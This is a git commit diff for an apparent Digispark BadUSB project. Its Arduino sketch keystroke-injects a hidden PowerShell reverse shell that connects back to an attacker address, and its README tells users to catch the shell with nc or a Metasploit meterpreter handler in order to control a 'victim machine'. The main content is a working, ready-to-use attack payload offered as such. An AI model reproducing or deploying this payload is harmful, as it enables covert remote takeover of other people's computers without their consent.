edit
This commit is contained in:
parent
00825a3676
commit
76dcb91f7e
|
@ -24,7 +24,7 @@ void loop() {
|
|||
DigiKeyboard.delay(2000);
|
||||
DigiKeyboard.println("cmd");//run cmd
|
||||
DigiKeyboard.delay(2000);
|
||||
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
|
||||
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('<YOUR_IP_ADDRESS>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
|
||||
DigiKeyboard.delay(5000);
|
||||
digitalWrite(1, HIGH); //turn on led when program finishes
|
||||
DigiKeyboard.delay(90000);
|
||||
|
|
|
@ -2,10 +2,23 @@
|
|||
|
||||
### Description:
|
||||
|
||||
#### 1: Install_Shell.ino:<br>
|
||||
#### 1: Instant_Shell.ino:<br>
|
||||
Starting instant shell to an attacker machine in less than 1 minute.<br>
|
||||
|
||||
**Instuctions:**<br>Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.<br>
|
||||
**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/)
|
||||
|
||||
Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html)
|
||||
|
||||
**Instructions:**
|
||||
Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer.
|
||||
|
||||
```
|
||||
nc -lvnp 4444
|
||||
```
|
||||
|
||||
```
|
||||
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP_ADDRESS>; set lport 4444; set ExitOnSession false; exploit -j"
|
||||
```
|
||||
|
||||
**Tested on:**<br>
|
||||
**OS**: Windows 10|11<br>
|
||||
|
|
Loading…
Reference in New Issue